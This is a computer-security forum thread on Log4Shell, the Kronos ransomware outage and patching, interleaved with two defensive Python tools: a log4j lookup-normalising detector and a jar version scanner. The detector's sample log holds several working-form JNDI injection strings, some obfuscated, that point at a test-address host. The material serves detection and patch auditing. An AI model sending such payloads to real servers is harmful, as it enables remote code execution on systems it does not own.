
[Computer Security Thread] CVEs, or "Crap! Vulnerabilities! Eughhhhh..."

Posts

  •
    furlion Riskbreaker Lea Monde Registered User regular
    JaysonFour wrote: »
    furlion wrote: »
    JaysonFour wrote: »
    So, a couple questions on this log4j thing:

    1) Is this something that home users need to worry about as far as patching anything on our machines? Is there anything we can do to avoid getting hit by this?

    2) Can we go on the net and play MMOs and access other sites and pretty much do whatever without our computers getting nailed by this, or something caused by this? Or is this a “better to stay offline until lots of patches for stuff finish migrating through the stuff you use” type of thing?

    3) How worried should we users be about getting our stuff hacked because of this?

    1) This is strictly for servers, so unless you are running a specific type of home server you are fine. Unfortunately, one of the servers you could be running is the Java version of Minecraft. You know, the most popular game of all time. Avoiding it is entirely up to the websites you access and services you use being patched as soon as possible. Nothing you can do.

    2) It is possible for someone to hack a server and use it to distribute malicious code. Apparently there are already exploits to do this floating around the internet. The problem is it could be literally any website/gaming service you connect to. Unless you want to go completely off the grid until this is all patched up you just have to deal with it as best you can. Basically look for the service/website to specifically state they have patched or use a different library.

    3) Since this can be used to gain complete control of any server running this library, all your data is basically up for grabs. They don't have to log into your account, they have your account and whatever information is stored with it. This is so bad they could take control of say Steam, push an update to the program that contains ransomware, and lock down the computers of everyone using it. I am not really sure how good antivirus software would work in such a situation.

    Well, that's just wonderful. Not mad about it, not anxious, just...

    I'm kind of staggered that something like this could still have happened, in this day and age. It's like the perfect storm of vulnerabilities- it's easy to utilize, it's in pretty much fucking everything, and stopping it requires the IT people of pretty much everything to be able to find and install a patch or new version of this Java stuff by app/server/etc... and of course there's also a lot of stuff that's never going to get updated because people are lazy or it's active but no longer supported... and then of course there's an onus on users to install the patches for the stuff they have to serverside.

    I'm just lucky I don't play Minecraft, I suppose. But god, all those poor IT people running on zero sleep and having to deal with and patch this and then deal with Patch Tuesday... I feel for them all. It's got to be hell for them.

    I got what I needed to done, so I'm just going to take it easy till Monday, I think. Let another 24-36 hours go for more patches to be pushed and hoping the patches beat the exploiters and this doesn't erupt into something much worse.

    Yeah it's not good. A few tech experts were calling this the biggest security issue of the past several years, a few even said decade.

    Gamertag: KL Retribution
    PSN:Furlion
  •
    Mostly Harmless Registered User regular
    edited December 2021
    This was entirely predictable, alas. Most businesses work on the basis that software projects can be “done”, rather than budgeting and planning for the ongoing maintenance that’s needed. And then outsource a lot of their work to open source projects, and don’t bother supporting them (either financially or via contributions of time). It’s no surprise that things eventually go tits up - although this is an unusually big one.

    Half of my time in a tech architect role seems to be working to convince the business that we really can’t just let their favourite product run forever with no further budget.

  •
    Mugsley Delaware Registered User regular
    Can I ask a stupid question: wasn't everyone supposed to be moving away from Java, in general? Or was that only Flash?

  •
    Orca Also known as Espressosaurus Wrex Registered User regular
    Mugsley wrote: »
    Can I ask a stupid question: wasn't everyone supposed to be moving away from Java, in general? Or was that only Flash?

    I don't work in the Java ecosystem so I can't say for certain, but I feel like sentiment has certainly gone from "meh" to negative since Oracle changed the licensing.

  •
    Six Caches Tweets in the mainframe cyberhex Registered User regular
    Mugsley wrote: »
    Can I ask a stupid question: wasn't everyone supposed to be moving away from Java, in general? Or was that only Flash?

    Java is everywhere.

    can you feel the struggle within?
  •
    Mostly Harmless Registered User regular
    Java on the browser-side is long dead, applets in particular. It, and the JVM ecosystem (Scala, Kotlin, Clojure, …) is very healthy server-side, and it’s big on Android too. The JVM itself is superb, and Java - while dated - has really strong tooling and is often the “safe choice”. For the more adventurous Kotlin is a pretty good balance between Java and Scala.

    I don’t think anyone uses the Oracle JVM anymore. It’s all OpenJDK. Likewise while GraalVM is neat, nobody wants Oracle’s tentacles anywhere near them.

  •
    schuss Registered User regular
    Yeah, Java is used a ton in backends and has tons of notes of how to get it to scale. Also, it has material startup/efficiency advantages in serverless ecosystems, so it's likely here to stay, much to the chagrin of many.

  •
    Inquisitor77 2 x Penny Arcade Fight Club Champion A fixed point in space and time Registered User regular
    I remember back when I was in high school and people were telling me, "Java is the future!"

    What they didn't tell me was that it was less like Star Trek and more like Mad Max.

  •
    Carpy Registered User regular
    Java's fine and there's nothing wrong with choosing it for a whole range of applications.

    The issue here isn't with the language used, it's the commercial sector's reliance on OSS for fundamental portions of their software without supporting its maintainers.

  •
    Dibbit Registered User regular
    Carpy wrote: »
    Java's fine and there's nothing wrong with choosing it for a whole range of applications.

    The issue here isn't with the language used, it's the commercial sector's reliance on OSS for fundamental portions of their software without supporting its maintainers.

    While more Open Source support would be great, that would not have prevented the Log4J bug.
    The fact that you can use JNDI to dynamically load missing classes from an external source combined with Log4J interpreting user input as a formatting string (A bad, bad idea) wasn't so much a "We have no funding for this" and more a "We didn't even realize this was a security issue, in hindsight, why do we allow this?"

    Maybe more funding would've allowed more security audits, but from my personal experience with VERY expensive, fully licensed and "supported" software,
    I can tell you that proprietary shops mostly don't bother keeping their software up to date. Heck, I have 2 servers where the official policy is "Just...Sandbox them as completely as possible, if you could airgap, that would be great. Using them? Ooh... do you REALLY have to?"

    They might want to sell you "The new completely rewritten version 2.56 Beta, that does about 40% of your current system, but it's shinier." It's full of bugs, but that's okay, it's BETA.
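The mechanism Dibbit describes above (log4j 2 runs `${...}` lookups over whatever lands in the logged message, and a `jndi:` lookup fetches from a server the attacker names) is also why the first detection rules people wrote were weak. The following is an added example, not code from the post or from the log4j project: a Python model of the handful of lookups attackers used to hide the word `jndi` (`${lower:…}`, `${upper:…}`, and the `${prefix:key:-default}` fallback), run over constructed web-server access-log lines. It is a detection aid, not a reimplementation of log4j; lookups it does not know are dropped, so nesting can only make a hidden `jndi:` body more visible, never less.

```python
import re
from typing import Dict, List, Tuple

# Innermost ${...} lookup: a body containing no further "${", "}" or "$".
_INNER = re.compile(r"\$\{([^{}$]*)\}")
# scheme://host[:port] at the front of a JNDI target such as ldap://203.0.113.9:1389/a
_TARGET = re.compile(r"^(?P<scheme>[a-z]+)://(?P<host>[^/:]+)(?::(?P<port>\d+))?", re.I)


def _resolve_body(body: str, hits: List[str]) -> str:
    """Evaluate one innermost lookup the way the attacker expects log4j to.

    Only the lookups used for obfuscation in the wild are modelled. Anything
    else without a ':-default' is dropped, so a hidden jndi body can only
    become more visible, never less.
    """
    low = body.lower()
    if low.startswith("jndi:"):
        hits.append(body[5:])
        return "<jndi>"                   # placeholder so the loop terminates
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:                      # ${prefix:key:-default}: failed lookup -> default
        return body.split(":-", 1)[1]     # covers ${::-j} and ${env:NOPE:-j}
    return ""


def normalize(message: str) -> Tuple[str, List[str]]:
    """Resolve nested lookups innermost-first; return (normalized text, jndi targets)."""
    hits: List[str] = []
    text = message
    for _ in range(64):                   # bound the work on hostile input
        new = _INNER.sub(lambda m: _resolve_body(m.group(1), hits), text)
        if new == text:
            break
        text = new
    return text, hits


def naive_count(lines: List[str]) -> int:
    """What a plain substring rule, the first thing most people deployed, catches."""
    return sum(1 for line in lines if "${jndi:" in line.lower())


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Report every resolved jndi: lookup with the host it would have contacted."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, 1):
        _, hits = normalize(line)
        for target in hits:
            m = _TARGET.match(target)
            findings.append({
                "line": lineno,
                "target": target,
                "scheme": m.group("scheme").lower() if m else None,
                "host": m.group("host") if m else None,
                "port": int(m.group("port")) if m and m.group("port") else None,
            })
    return findings


# Constructed access-log lines (RFC 5737 test addresses). The User-Agent field
# carries the payloads, which is where most real attempts landed.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:12:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:12:01:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.9:1099/x}"',
    '203.0.113.7 - - [10/Dec/2021:12:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/z}"',
    '203.0.113.7 - - [10/Dec/2021:12:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOTSET:-j}ndi:dns://203.0.113.9/ping}"',
    '203.0.113.7 - - [10/Dec/2021:12:01:07 +0000] "GET /search?q=${java:version} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    print("substring rule catches:", naive_count(SAMPLE_LOG))
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']} -> {f['host']}:{f['port']} ({f['target']})")
```

Run it and compare `naive_count` with `scan_log`: the substring rule sees one of the four payloads, the resolver sees all four, including the `${::-j}` form that survives case-insensitive matching. The host and port it extracts are what you pivot on in egress and DNS logs; a `jndi:` lookup that actually resolved means the JVM made an outbound LDAP, RMI or DNS connection to that address.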

  •
    Dibbit Registered User regular
    *Grumble Grumble*
    So, heads up, we don't use Java, but... VMware does, and it uses Log4J.
    So, update your VMware servers, peeps. Cause hackers can hack the hypervisor.

  •
    JaysonFour Classy Monster Kitteh Registered User regular
    Given what’s known about this thing, I have a hunch that this might be related to this mess.

    Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.

    Kronos is a workforce management and human resources provider who provides cloud-based solutions for managing timekeeping, payroll, employee benefits, analytics, and more. In 2020, Kronos merged with Ultimate Software to create a new company named UKG.

    According to Kronos, KPC is secured using firewalls, multi-factor authentication, and encrypted transmissions to prevent unauthorized access to their systems.

    Unfortunately, the threat actors were able to breach these systems and likely encrypted servers as part of the attack.

    …that’s pretty much admitting it was the log4j stuff without saying it, yeah?

    The company’s saying two things: 1) they’re looking at downtime in weeks before this is unfucked, and 2) they advise customers if they need services like they provide, to go find someone else in the same market.

    I can has cheezburger, yes?
  •
    zagdrob Registered User regular
    JaysonFour wrote: »
    Given what’s known about this thing, I have a hunch that this might be related to this mess.
    […]
    …that’s pretty much admitting it was the log4j stuff without saying it, yeah?

    Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. Basically if you're the IT guys working for Kronos and your whole network just got taken down by ransomware like this, you pray that it was some zero day like log4j because it's really not your fault or anything you could do to stop it. It far beats the alternative that you fucked up somewhere.

    More likely this is an attack like the DarkSide / Colonial Pipeline attack that has been in the works for months or longer. But it'll probably be a little while before there is a comprehensive forensic analysis of how these guys were breached.

    On the plus side, our developers said we don't need to worry about log4j because the only applications using that library are on 1.2.15 which isn't named in the referenced vulnerability so they don't have to take any action. :bigfrown:

  •
    Phyphor Building Planet Busters Tasting Fruit Registered User regular
    Dibbit wrote: »
    […]
    The fact that you can use JNDI to dynamically load missing classes from an external source combined with Log4J interpreting user input as a formatting string (A bad, bad idea) wasn't so much a "We have no funding for this" and more a "We didn't even realize this was a security issue, in hindsight, why do we allow this?"
    […]

    Yeah there are levels of "why do we even have this lever?" here. I honestly can't think of a single reason that a logging service should be dynamically loading classes specified by the logging string at all

    Okay sure java is super enterprisey and the ability to do dependency injection of all kinds everywhere is sort of its thing but in logs???

  •
    BlackDragon480 Bluster Kerfuffle Master of Windy Import Registered User regular
    JaysonFour wrote: »
    Given what’s known about this thing, I have a hunch that this might be related to this mess.
    […]

    Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.

    No matter where you go...there you are.
    ~ Buckaroo Banzai
  •
    ManetherenWolf Registered User regular
    JaysonFour wrote: »
    […]

    Well, that explains why the time clocks at my workplace have been saying "Server Offline" since Thursday.

    yeah Kronos is kind of -THE- Time clock software for businesses. Ours has been down since late Saturday, and I know of several other companies in the same boat.

    Nothing like Payroll getting fucked up right before Christmas huh?

  •
    JaysonFour Classy Monster Kitteh Registered User regular
    zagdrob wrote: »
    JaysonFour wrote: »
    […]
    Nothing in the article seems to indicate log4j, and it feels like this was a bit fast for a comprehensive attack using a newly discovered exploit. If log4j were the vector I'd guess it would be more explicitly named. […]

    Eh, maybe so. The timing of it was pretty damned suspicious, though.

    I can has cheezburger, yes?
  •
    BlackDragon480 Bluster Kerfuffle Master of Windy Import Registered User regular
    edited December 2021
    JaysonFour wrote: »
    […]
    yeah Kronos is kind of -THE- Time clock software for businesses. Ours has been down since late Saturday, and I know of several other companies in the same boat.

    Nothing like Payroll getting fucked up right before Christmas huh?

    Thankfully my workplace handles boatloads of financial transactions every day and can easily have HR cut hard checks calculated with the manual time-in sheets that we use every day, even when Kronos is up and running (one of the few perks of direct government oversight that loves paper redundancies). But I know 90+% of places don't have the same luxury.

    No matter where you go...there you are.
    ~ Buckaroo Banzai
  •
    schuss Registered User regular
    JaysonFour wrote: »
    zagdrob wrote: »
    […]
    Eh, maybe so. The timing of it was pretty damned suspicious, though.

    I mean, they're a huge target as they're basically 2 of the top 5 timekeeping players combined AND they have a huge legacy footprint, so likely lots of workarounds/hardcoded passwords etc.
    Log4j is possible, but just as likely it was a traditional attack on their home infrastructure.

  •
    LD50 Registered User regular
    schuss wrote: »
    […]
    I mean, they're a huge target as they're basically 2 of the top 5 timekeeping players combined AND they have a huge legacy footprint, so likely lots of workarounds/hardcoded passwords etc.
    Log4j is possible, but just as likely it was a traditional attack on their home infrastructure.

    I've worked with Kronos before and I expect it's this.

  •
    Carpy Registered User regular
    So updates to log4shell:

    - the initial patch, 2.15-rc1 wasn't comprehensive. A second patch, 2.15-rc2, was released a couple days later and there's now a stable version, 2.16, that completely disables JNDI by default. Double check your versions if you've already patched

    - bypasses have been found for most of the initially suggested mitigations, like upgrading JDK/jre or using command line flags. Gotta patch this one
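Carpy's "double check your versions" is harder than it sounds, because log4j-core is rarely installed as a package: it is buried inside application jars, WAR files and Spring Boot fat jars, sometimes several levels deep. The following is an added example, mine rather than the post's or Apache's: a Python scanner that walks a directory, opens every archive, recurses into nested archives, reads the Maven `pom.properties` that log4j-core ships with, and checks whether `JndiLookup.class` is still present (deleting that class from the jar was the Apache advisory's stop-gap for installs that could not be upgraded). The fixtures are constructed in memory with `build_jar`; the 2.16.0 floor follows the post and is a parameter, since the 2.12.x and 2.3.x backport branches have their own fixed releases and later advisories raised the floor again.

```python
import io
import re
import zipfile
from pathlib import Path
from typing import Dict, Iterator, List, Optional, Tuple

# Entries that identify log4j inside an archive. pom.properties is what Maven
# embeds in log4j-core; JndiLookup.class is the file the advisory said to delete.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"

# Floor used in this thread: 2.16.0 turns JNDI off by default. Adjust per branch.
FIXED = (2, 16, 0)
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(pom_properties: str) -> Optional[Tuple[int, ...]]:
    """Pull 'version=2.14.1' out of pom.properties; None if it is not there."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.M)
    return tuple(int(g) for g in m.groups()) if m else None


def inspect_jar(data: bytes, name: str) -> Dict[str, object]:
    """Classify one archive and recurse into archives nested inside it."""
    info: Dict[str, object] = {"name": name, "version": None,
                               "jndi_lookup": False, "log4j1": False, "nested": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            info["version"] = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        info["jndi_lookup"] = JNDI_LOOKUP in names
        info["log4j1"] = LOG4J1_MARKER in names
        for entry in sorted(names):
            if entry.lower().endswith(ARCHIVE_EXT):
                try:
                    info["nested"].append(inspect_jar(zf.read(entry), f"{name}!{entry}"))
                except zipfile.BadZipFile:
                    pass  # a .zip resource that is not really an archive
    return info


def verdict(info: Dict[str, object]) -> str:
    version, has_jndi = info["version"], info["jndi_lookup"]
    if info["log4j1"]:
        return "LOG4J1"      # end of life; not CVE-2021-44228 itself, review separately
    if version is not None:
        if version >= FIXED:
            return "OK"
        return "VULNERABLE" if has_jndi else "MITIGATED"  # class deleted per advisory
    if has_jndi:
        return "REVIEW"      # shaded/relocated jar lost pom.properties: version unknown
    return "NONE"


def flatten(info: Dict[str, object]) -> Iterator[Dict[str, object]]:
    yield info
    for child in info["nested"]:
        yield from flatten(child)


def scan_dir(root: Path) -> List[Tuple[str, str]]:
    """Walk a tree and report (archive name, verdict) for every archive found."""
    report: List[Tuple[str, str]] = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_EXT:
            top = inspect_jar(path.read_bytes(), path.relative_to(root).as_posix())
            report.extend((i["name"], verdict(i)) for i in flatten(top))
    return report


def build_jar(entries: Dict[str, object]) -> bytes:
    """Constructed fixture: a minimal zip with the given entries (str or bytes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for entry, content in entries.items():
            zf.writestr(entry, content)
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    cafe = b"\xca\xfe\xba\xbe"  # class-file magic, stands in for a real .class
    vuln = build_jar({POM_PROPS: "version=2.14.1\n", JNDI_LOOKUP: cafe})
    fixtures = {
        "lib/log4j-core-2.14.1.jar": vuln,
        "lib/log4j-core-2.16.0.jar": build_jar({POM_PROPS: "version=2.16.0\n", JNDI_LOOKUP: cafe}),
        "lib/log4j-core-2.14.1-stripped.jar": build_jar({POM_PROPS: "version=2.14.1\n"}),
        "lib/log4j-1.2.15.jar": build_jar({LOG4J1_MARKER: cafe}),
        "app/service.jar": build_jar({"META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n",
                                      "BOOT-INF/lib/log4j-core-2.14.1.jar": vuln}),
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, data in fixtures.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        for name, result in scan_dir(Path(tmp)):
            print(f"{result:<10} {name}")
```

Point `scan_dir` at a deploy directory or a mounted image and act on the verdicts: `VULNERABLE` and `REVIEW` need a patch, `MITIGATED` means someone already deleted the class and the jar should still be upgraded, and `LOG4J1` is a separate conversation about an end-of-life library. Note that a nested jar is reported on its own line with a `!` path, which is where fat-jar copies hide from `find / -name 'log4j-core*'`.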

  •
    Mostly Harmless Registered User regular
    Still, feeling pretty cocky for having chosen Logback for our stack now :biggrin:

    That aged well. I should know better by now. Mind, it’s not of the severity of the Log4J one, so I can still feel a little cocky.

  •
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    Carpy wrote: »
    So updates to log4shell:
    […]

    Also a reminder that if you've patched, it doesn't mitigate any previous intrusion. If someone leveraged log4j vulnerabilities to drop a shell, then patching will only prevent someone from getting in via log4j in the future.

    There are some rumblings and reports that malicious actors are already breaking into servers, setting up some nice, hidden backdoors, and then patching the servers on their way out so that no one thinks anything is wrong.

  •
    autono-wally, erotibot300 love machine Registered User regular
    Carpy wrote: »
    […]
    There are some rumblings and reports that malicious actors are already breaking into servers, setting up some nice, hidden backdoors, and then patching the servers on their way out so that no one thinks anything is wrong.

    Oh yeah this one's gonna be fun for a long time

  •
    LD50 Registered User regular
    A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.

  •
    autono-wally, erotibot300 love machine Registered User regular
    LD50 wrote: »
    A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.

    I mean that's probably to be expected, but you got a link about that?

  •
    LD50 Registered User regular
    LD50 wrote: »
    A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.

    I mean that's probably to be expected, but you got a link about that?

    Unfortunately I heard it through word of mouth. Best I can find:
    https://www.hipaajournal.com/max-severity-apache-log4j-zero-day-vulnerability-extensively-exploited-in-the-wild/

    Since there have been many cases of the flaw being exploited, it should be assumed that the flaw has already been exploited. You should check logs for any unusual activity before applying patches to fix the vulnerability.

    It's worth noting that it was discovered because it was actively being used to exploit Minecraft servers in the wild.

    Edit: this other article I found contradicts that so who knows:
    https://www.techtarget.com/searchsecurity/news/252510892/Critical-Log4j-flaw-exploited-a-week-before-disclosure

  •
    Thawmus +Jackface Registered User regular
    LD50 wrote: »
    A friend of mine mentioned that there was some evidence that the vulnerability may have been exploited before it was known publicly, potentially for a long time.

    This is typically true of most exploits though. It's honestly to be expected.

    Twitch: Thawmus83
  •
    Carpy Registered User regular
    Cloudflare and Cisco Talos are reporting 12/1 & 12/2 respectively.

    Cisco Talos Advisory
    Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

  •
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    An aspect of the Log4J debacle that I didn't appreciate:

  •
    Jazz Registered User regular
    One of those memes that just keeps on giving.

  •
    Inquisitor77 2 x Penny Arcade Fight Club Champion A fixed point in space and time Registered User regular
    IT'S PRONOUNCED JIFF!!!

  •
    Bucketman Call me Skragg Registered User regular
    Dibbit wrote: »
    *Grumble Grumble*
    So, heads up, we don't use Java, but... VMware does, and it uses Log4J.
    So, update your VMware servers, peeps. Cause hackers can hack the hypervisor.

    Spent most of last week doing this. Worked 2 14 hour days. I'm not even on the server team!

  •
    LostNinja Registered User regular
    What is the preferred way to format/wipe an old computer?

    I have a gaming desktop that I don’t use anymore that I’d like to wipe and then donate or give to family. It’s 7-ish years old and outdated for gaming but still beefy enough for most people’s uses.

  •
    Shadowfire Vermont, in the middle of nowhere Registered User regular
    Just wipe it. Have Windows delete the partitions during setup and then do the install. You don't need to do much else if you're giving it to family.

    WiiU: Windrunner ; Guild Wars 2: Shadowfire.3940 ; PSN: Bradcopter
  •
    Frem Registered User regular
    NVidia is the latest company to get hacked. I hope they’ll be auditing their software updates super carefully.

    https://www.eurogamer.net/articles/2022-02-28-nvidia-completely-compromised-by-cyber-attack

  •
    LostNinja Registered User regular
    Upside: I own stock in AMD and not NVidia

    Con: all my home computers use NVidia…

  •
    TetraNitroCubane The Djinnerator At the bottom of a bottle Registered User regular
    Seems like a good idea to stay on older drivers until there's some assurance they have done some serious due diligence.

  •
    Orca Also known as Espressosaurus Wrex Registered User regular
    My question is have they figured out how long they were penetrated for? What's the window of vulnerability?

  •
    BahamutZERO Registered User regular
    All night long, awwww yeaaaah
